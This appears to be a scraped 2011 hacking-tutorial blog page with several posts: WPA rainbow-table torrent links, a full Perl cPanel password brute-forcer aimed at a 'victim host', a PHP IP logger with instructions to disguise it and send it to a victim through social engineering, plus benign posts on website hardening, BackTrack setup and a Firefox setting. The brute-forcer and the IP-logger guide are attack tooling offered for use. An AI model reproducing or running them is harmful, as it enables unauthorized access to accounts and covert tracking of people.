<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/WLAN_PS.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">WLAN_PS.wpa</a></li>
<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/WLAN.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">WLAN.wpa</a></li>
<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/WLCM.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">WLCM.wpa</a></li>
<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/workgroup.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">workgroup.wpa</a></li>
<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/Zoom.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">Zoom.wpa</a></li>
<li class="spip" style="color: #4a4a4a; font-family: Tahoma; font-size: 11px; line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"><a class="spip_out" href="http://www.offensive-security.com/wpa-tables/ZyXEL.wpa.torrent" style="color: #b23737; font-family: Tahoma; font-size: 11px; line-height: 18px;" target="_blank">ZyXEL.wpa</a></li>
</span></ul>
<div class="spip">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;">More info: <a class="spip_out" href="http://www.offensive-security.com/wpa-tables/" style="color: #b23737;" target="_blank">here</a></span></div>
<div class="spip">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;">Thanks to our friends of <a class="spip_out" href="http://www.offensive-security.com/" style="color: #b23737;" target="_blank">Offensive Security</a>.</span><br />
<br />
</div>
</div>
</div>
</div>

Cipher Hacking Password Cracking Rainbow Tables Wi-Fi WPA Rainbow Tables (Offensive Security)

WPA RAINBOW TABLES (OFFENSIVE SECURITY) Full list of torrents with WPA Rainbow Tables, from Offensive Security. Each of the f...

Cpanel Password Brute Forcer

9/25/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha0FOq6H3_NuqzqYMfE4uzSEm3n45BUfzQ7mKIM-8D04PI2-3s1cZ840CUtB0yUxTNdQ7o5c1ig6BQWhtb9r-EtG5nIuZ3WwOW70bZatbyZpyYMOITCAMbaJGvITIfkxoEwILcNk9W0IUh/s1600/cpanel+bruteforce.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha0FOq6H3_NuqzqYMfE4uzSEm3n45BUfzQ7mKIM-8D04PI2-3s1cZ840CUtB0yUxTNdQ7o5c1ig6BQWhtb9r-EtG5nIuZ3WwOW70bZatbyZpyYMOITCAMbaJGvITIfkxoEwILcNk9W0IUh/s640/cpanel+bruteforce.jpg" width="640" /></a></div><br />
<br />
<div class="program glow"><pre><code class="prettyprint">
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/

use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}
</code></pre></div><span style="color: red;">Further Reading:</span><br />
<a href="http://www.turkhackteam.net/exploitler/22051-cpanel-password-brute-force-tool-perl-exploit.html" target="_blank"> Perl cPanel Bruteforcer</a><br />
<a href="http://bustedhumor.com/preview-cpanel-bruteforcer-safe-mode-open-basedir-bypasser-t-1951.html">Perl cPanel Bruteforcer Preview</a><br />
<br />
Regards,<br />
Hardeep Singh<br />
(<a href="http://www.fb.com/h4rdeep">www.fb.com/h4rdeep</a>)<br />
<div></div></div>

Cipher cPanel Hacking Hacking Tutorials Tutorials Cpanel Password Brute Forcer

# Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # ...

Securing the Web

9/25/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAgpxGTak2XLAfaHcG2B8cFfd2LQhguWRnOiFpIlFr9OeFD22tlABEmPA80wC8YN0mHVBIzHvLqlVvO9KfEvABGGsgKaADKMV81gjuD-o_QWvnyWmPMwRGncNYcJ6dbzU9_oJeBbcATeTc/s1600/secure-web.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAgpxGTak2XLAfaHcG2B8cFfd2LQhguWRnOiFpIlFr9OeFD22tlABEmPA80wC8YN0mHVBIzHvLqlVvO9KfEvABGGsgKaADKMV81gjuD-o_QWvnyWmPMwRGncNYcJ6dbzU9_oJeBbcATeTc/s400/secure-web.jpg" width="400" /></a></div><br />
<h3>Introduction:</h3><br />
All most every website on the internet has a risk of getting Hacked .The growing generation of new Hackers are able to exploit almost every digital device from mobile to a calculator! , so websites are easy for them to Hack and compromise. Every year people pay thousands and thousands of rupees just to protect their<br />
<br />
 websites from not getting hacked. Cyber security is a major concern now a days for everyone from a business man to a government employee or even the common man. Imagine a situation in which you are a business man who has a database of information about your clients and your site has been hacked. What will you do? All your clients will be angry with you because of their privacy disclosure and your business will go down.<br />
<br />
But if you will protect your website then this situation will never come in your life.<br />
<h3>Protecting your website:</h3><br />
<h3>Old version of web server:</h3>One of the most common mistakes that people make is that they just use old versions of web server. This is actually a very big vulnerability as any attacker can easily exploit the loophole in that web server and get inside your server.<br />
<br />
<h3>Invalid or expired SSL certification:</h3>If a website has a login page then a valid SSL certification should be installed into the server not an invalid SSL certification. The SSL server encrypts the traffic.For example this is an example of an expired or an invalid SSL certification:<br />
<br />
The SSL certificate (<div class="system pop">serial: 00f716cc219f44c663 </div>) is expired.<br />
<br />
The cerificate valability period is: <div class="system pop">Thu Jan 22 19:52:15 UTC+0530 2009 to Fri Jan 22 19:52:15 UTC+0530 2010 </div>In this situation the attacker can easily install a sniffer and start sniffing all the data that is being passed to the server.<br />
<br />
<h3>Server Vulnerable to XSS:</h3>XSS or cross site scripting is the process in which the attacker hacks the website by injecting some javascript into the website. www.In.com vulnerable to XSS XSS is a very common method and even FBI and CIA are vulnerable to it.<br />
<br />
This attack can be easily prevented easily by filtering all the special characters (#, <,” ,/,…etc) from being inputted into the search field and also filtering them into the commenting fields.<br />
<br />
<h3>Server Vulnerable to SQL injection:</h3><br />
SQL injection is also as common as XSS but the only thing is that here the attacker tries to input SQL commands into the server and get into the database or log into the admin page without proper username and password.<br />
<br />
This attack can also be prevented by filtering all the special characters from being inputted into any input field.<br />
<br />
<h3>Default Password and usernames:</h3>Some administrators are so dumb that they forget to remove default passwords from the script of the login page, this means that anyone can login into the admin panel of the site with the username as “root” or “admin” and password as “root” or “admin” too. This vulnerability can be patched up by removing this feature from the script.<br />
<br />
<h3>Unrestricted applications:</h3>Here in this vulnerability the site has a editor which can be used to upload files to the server for example the url can be <div class="system pop">www.site.com/backhend_of_site/fck/editor/fckeditor.html </div>This will show up the following:<br />
<br />
And here I can upload anything without the admin privileges. To protect you self from these kind of attacks always use validated softwares.<br />
<br />
<h3>Admin page access:</h3><br />
Some people just don’t change the admin page location, for example people have admin page at www.site.com/admin. This is a vulnerability because if we have got access to admin page then we can try out SQL injections on the admin page. So always change the admin page to something like: <div class="system pop">www.site.com/abc</div><br />
<h3>Robots.txt:</h3>Robots.txt file tells us about what features the site has allowed and disallowed so one can get a list of possible directories in a server like:<br />
<div class="content shadow-radial">User-agent: *<br />
  Disallow: /search<br />
  Disallow: /groups<br />
  Disallow: /images<br />
  Disallow: /catalogs<br />
  Disallow: /catalogues<br />
  Disallow: /news</div>We can prevent this by adding less directories to the robots.txt file and password protecting all the directories which come inside this file.<br />
<br />
<h3>Test.php:</h3>This file contains all the configuration of the php server running on the server so one should block it.For example the URL can be: http://site.com/test.php. We can protect from this kind of attacks by removing this file.<br />
<br />
<h3>Conclusion:</h3><br />
We have come to the end of this article. These were the some of the methods.<br />
<br />
<span style="color: red;">Further Reading:</span> <br />
<a href="https://www.owasp.org/index.php/OWASP_Guide_Project">https://www.owasp.org/index.php/OWASP_Guide_Project</a><br />
<a href="http://www.securecomputing.com/SecureIFV/index.cfm?tabs=w,m,f,s,sf,sg">http://www.securecomputing.com/SecureIFV/index.cfm?tabs=w,m,f,s,sf,sg</a><br />
<br />
Regards,<br />
<br />
Hardeep Singh<br />
(<a href="http://www.facebook.com/h4rdeep">www.facebook.com/h4rdeep</a>)<br />
</div>

Linux Tutorials OWASP Tutorials Web Security Securing the Web

Introduction: All most every website on the internet has a risk of getting Hacked .The growing generation of new Hackers are able to explo...

Log Victim's IP

9/15/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsDlATYYfFc2ovTVM96Y1Cpyhitu8FOG9ENtl1IMUuZPY78aqGmeE0ZN5BLNCFdReuzo2ke4XLwQkfDWzpyXUV5h0ZziqZAg5a17k4KB0wkpvoNzSuVMXasuYjBX_OOp93uq8zx2kmotD/s1600/ip+logger.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsDlATYYfFc2ovTVM96Y1Cpyhitu8FOG9ENtl1IMUuZPY78aqGmeE0ZN5BLNCFdReuzo2ke4XLwQkfDWzpyXUV5h0ZziqZAg5a17k4KB0wkpvoNzSuVMXasuYjBX_OOp93uq8zx2kmotD/s400/ip+logger.gif" width="367" /></a></div><br />
I know you most of the time search on Google, Yahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive response, and there are also many ways by which you can log IP, but all those methods are a little bit tough as compared to my one, I have found a fresh technique by which you can log your victim's IP easily. This method is far most the best way of logging IP which I used myself many times.<br />
<br />
<br />
<h3>What we will need?</h3>This method doesn't require any heavy program or any other means. It will require:<br />
<br />
<br />
A Free and powerful hosting. I will recommend to use My3gb, or else your wish.<br />
A Php script to log IP which I have provided below.<br />
Some brain and a little bit HTML knowledge<br />
<br />
<h3>How to Setup your IP logger?</h3>After fulfilling all the required things, we will have to setup our IP logger so that it can log IPs. Create your account at any free hosting site,I use My3gb by myself, or you can also use any other hosting as per your choice. Open notepad and paste this script:<br />
<br />
<div class="program glow"><pre><code class="prettyprint">
<html>
<?php
$file = "log.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n\n"); 
fclose($f);
?>
//You can customize this part to make your page look attractive
</body>
</html>
</code></pre></div>Save this as Logger.php. Then you will have to create a text file with name <div class="system pop">log.txt </div>. After creating both these files, upload it to your website.<br />
<br />
<br />
<h3>How to log IPs?</h3>After uploading these files you will get a link, copy the link of your "Logger.php" file and send it to your victim by any means, but before doing this, test it for minimum two times on yourself. Now you can get the IP of your victim as soon as he open that link and the IPs will be logged in your "log.txt".<br />
<br />
Customize the Logger.php file<br />
This is very important step because as soon as your victim's visit your IP logging page then if he will find nothing or some suspicious thing then he will came to know that there is something wrong. For securing yourself from this suspicion you will have to customize your file, its easy if you have a little bit knowledge of HTML. Using HTML, you can simply made a small beautiful page for your victim. You can learn HTML from w3schools<br />
<br />
<br />
Now you will need some brains as I told above to send that Logger.php link to your victim, this can only be done by you, I cannot help you in this much, you can use Social Engineering or any other method like that.<br />
<br />
Regards,<br />
Hardeep Singh<br />
(<a href="mailto:h4rdeep@facebook.com">h4rdeep@facebook.com</a>)<br />
(<a href="http://www.fb.com/h4rdeep">www.fb.com/h4rdeep</a>)</div>

Hacking Hacking Tools Hacking Tutorials Scripts Tutorials Log Victim's IP

I know you most of the time search on Google, Yahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive re...

BackTrack - Basic Usage

9/15/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBgoI8Vqq2A1nLFk97rZhbb4REMZNqb_mwGq-YxNva2dRBs2F-0R2fkqT6dUD6vX_NVWjk3Jp8gUXW4NvW_NYJ7LvghsuYRmU2W2fp_MiOk5djZFEfobxbILk6a5_X_XgW05Vgq9PNsmAI/s1600/backtrack.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBgoI8Vqq2A1nLFk97rZhbb4REMZNqb_mwGq-YxNva2dRBs2F-0R2fkqT6dUD6vX_NVWjk3Jp8gUXW4NvW_NYJ7LvghsuYRmU2W2fp_MiOk5djZFEfobxbILk6a5_X_XgW05Vgq9PNsmAI/s400/backtrack.jpeg" width="400" /></a></div><h3>Login to BackTrack</h3><br />
Once the BackTrack is Installed, the default username and password required to log in are root / toor.<br />
NOTE: You will not be able to see the password as you type it.<br />
<br />
<h3>GUI</h3><ul><li>After login give startx command.</li>
<li>Getting Networking to work</li>
<li>Setting your IP manually</li></ul><br />
We will first set up the networking manually. In the following example we will assume the following addresses and their purpose:<br />
<div class="content shadow-radial">IP Address - 192.168.1.112/24<br />
  Default Gateway - 192.168.1.1<br />
  DNS server - 192.168.1.1</div><br /><br />
In order to set these up we will run the following commands:<br />
<div class="command wobble-horizontal">root@bt:~# ifconfig eth0 192.168.1.112/24<br />
  root@bt:~# route add default gw 192.168.1.1<br />
  root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf</div><br />
Getting a static IP to stick between reboots<br />
<br />
These settings however will only last until you reboot, so if we want to save them between reboots we need to edit the /etc/network/interfaces file like this:<br />
<div class="content shadow-radial"># This file describes the network interfaces available on your system<br />
  # and how to activate them. For more information, see interfaces(5).<br />
  # The loopback network interface<br />
  auto lo<br />
  iface lo inet loopback<br />
  # The primary network interface<br />
  auto eth0<br />
  iface eth0 inet static<br />
  address 192.168.1.112<br />
  netmask 255.255.255.0<br />
  network 192.168.1.0<br />
  broadcast 192.168.1.255<br />
  gateway 192.168.1.1</div><br />
Edit the file as appropriate, then have the network come up automatically at boot time:<br />
<br />
<div class="command wobble-horizontal">root@bt:~# update-rc.d networking defaults<br />
  root@bt:~# /etc/init.d/networking restart</div><br />
<h3>Getting an IP from DHCP</h3>In order to get an IP from a DHCP server we can issue the dhclient <interface> command as follows:<br />
<div class="command wobble-horizontal">root@bt:~# dhclient eth0<br />
  Internet Systems Consortium DHCP Client V3.1.1<br />
  Copyright 2004-2008 Internet Systems Consortium.<br />
  All rights reserved.<br />
  For info, please visit <a href="http://www.isc.org/sw/dhcp/">http://www.isc.org/sw/dhcp/</a> Listening on LPF/eth0/00:0c:29:81:74:21<br />
  Sending on LPF/eth0/00:0c:29:81:74:21<br />
  Sending on Socket/fallback<br />
  DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67<br />
  DHCPACK of 192.168.1.112 from 192.168.1.1<br />
  bound to 192.168.1.112 -- renewal in 37595 seconds.<br />
  root@bt:~#</div> Using the script to start networking<br />
There is a script to start networking in the /etc/init.d directory which attempts to start every interface listen in /etc/network/interfaces (you can remove the ones you don’t need). To start it issue the following command:<br />
<div class="command wobble-horizontal">root@bt:~# /etc/init.d/networking start</div><br />
<h3>WICD Network Manager</h3>Another way to set up your networking is using the WICD Network Manager, you can find it in the menu:<br />
Menu > Internet > Wicd Network Manager<br />
<br />
<h3>Changing the root password</h3>As you know Backtrack comes with a default username and password (root/toor) it is IMPORTANT that we change that root password especially when running services such as SSH. We can change the password by issuing the passwd command:<br />
<br />
<div class="command wobble-horizontal">root@bt:~# passwd Enter new UNIX password: {enter your new password here } Retype new UNIX password: {enter your new password again} passwd: password updated successfully <br />
  root@bt:~#</div><br />
<h3>Starting services</h3>BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:<br />
<br />
<div class="command wobble-horizontal">root@bt:~# sshd-generate # Specific to the SSH service - needed to generate SSH keys<br />
  root@bt:~# /etc/init.d/ssh start<br />
  Starting OpenBSD Secure Shell server: sshd.<br />
  root@bt:~# /etc/init.d/ssh stop<br />
  Stopping OpenBSD Secure Shell server: sshd.<br />
  root@bt:~# </div><br /><br />
When using a ssh server for the first time on Backtrack you will need to generate keys:<br /><br />
<div class="command wobble-horizontal">root@bt:~# sshd-generate</div>To enable a service at boot time, you can use the update-rc.d command, for example, having SSH start at boot time:<br />
<div class="command wobble-horizontal">root@bt:~# update-rc.d -f ssh defaults<br />
  Adding system startup for /etc/init.d/ssh ...<br />
  /etc/rc0.d/K20ssh -> ../init.d/ssh<br />
  /etc/rc1.d/K20ssh -> ../init.d/ssh<br />
  /etc/rc6.d/K20ssh -> ../init.d/ssh<br />
  /etc/rc2.d/S20ssh -> ../init.d/ssh<br />
  /etc/rc3.d/S20ssh -> ../init.d/ssh<br />
  /etc/rc4.d/S20ssh -> ../init.d/ssh<br />
  /etc/rc5.d/S20ssh -> ../init.d/ssh<br />
  root@bt:~#</div><br />
<h3>Common apt commands</h3>apt-get install <package> Downloads <package> and all of its dependencies, and installs or upgrades them.<br />
apt-get remove [--purge] <package> Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.<br />
apt-get update Updates packages listings from the repo, should be run at least once a week.<br />
apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.<br />
apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.<br />
apt-cache search <pattern> Searches packages and descriptions for <pattern>.<br />
apt-cache show <package> Shows the full description of <package>.<br />
apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships to other packages.<br />
man apt Will give you more info on these commands as well as many that are in less common usage.<br />
<br />
<h3>Common dpkg commands</h3>dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for example.<br />
dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.<br />
dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.<br />
dpkg -r <package> Removes an installed package named <package><br />
dpkg -P <package> Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.<br />
dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.<br />
dpkg -s <package> Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.<br />
dpkg-reconfigure <package> Reconfigures an installed package<br />
man dpkg Will give you more info on these commands as well as many that are in less common usage.<br />
<br />
<h3>How do I find more information on a particular command or programs usage ?</h3>Most commands will have what is called a man page (manual page) which can be viewed by typing:<br />
<div class="command wobble-horizontal">root@bt:~# man <command you want more info on></div><br /><br />
Another very good resource on linux command usage can be found at <span class="system pop">linuxcommand.org </span>Some programs do not have a man page, but you can usually get more information on it's usage by typing: Just the program name without any arguements.<br />
or<br />
<div class="command wobble-horizontal">root@bt:~# <program name> -help </div><b>or </b> <div class="command wobble-horizontal">root@bt:~# <program name> --help</div><b> or </b><div class="command wobble-horizontal">root@bt:~# <program name> -h</div><br/><br />
Some programs use other methods, but they are usually just a variation of one of the above five commands.<br />
<br />
Regards,<br />
Hardeep Singh<br />
(<a href="http://www.fb.com/h4rdeep" target="_blank">www.fb.com/h4rdeep</a>)<br />
</div>

Backtrack Hacking Tutorials Linux Linux Tutorials OS Tutorials BackTrack - Basic Usage

Login to BackTrack Once the BackTrack is Installed, the default username and password required to log in are root / toor. NOTE: You will n...

Make old Firefox Addons Compatible

9/10/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCkoSjgRSApvupKMaqOyBIN3pQG9eXoHahQPv8BHu2l2aF0Ho8puSk9lZPT4nngGI6zXL-QlatX_Ni4zZsCHN1zrDNRYuvBru_dxbbNdDSSab_G9CBRHSwcy3g3W9ZDut3iUgHWJAO29HS/s1600/firefox-add-ons.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCkoSjgRSApvupKMaqOyBIN3pQG9eXoHahQPv8BHu2l2aF0Ho8puSk9lZPT4nngGI6zXL-QlatX_Ni4zZsCHN1zrDNRYuvBru_dxbbNdDSSab_G9CBRHSwcy3g3W9ZDut3iUgHWJAO29HS/s400/firefox-add-ons.jpg" width="400" /></a></div><br />
First Type <div class="command wobble-horizontal">about:config </div><br /><br />
On Address Bar and Press Enter<br />
Then it will ask with some damn Things.., Just Click "I'll be careful , I promise "<br />
Don't Do any thing with out this Tut..,<br />
i will not responsible if u Sucked it okay.. LOL<br />
After that Right Click ----> New ----> Boolean<br />
<br />
in there Type <br />
<div class="command wobble-horizontal">extensions.checkCompatibility.5.0 </div><br /><br />
As Picture Give Value as False and Ok.<br />
<br />
Thats all !!!.....<br />
<br />
Regards:<br />
<br />
Hardeep Singh<br />
( <a href="http://www.fb.com/h4rdeep">www.fb.com/h4rdeep</a> )</div>

Addons Firefox Linux Tutorials Tutorials Make old Firefox Addons Compatible

First Type about:config On Address Bar and Press Enter Then it will ask with some damn Things.., Just Click "I'll be careful , I...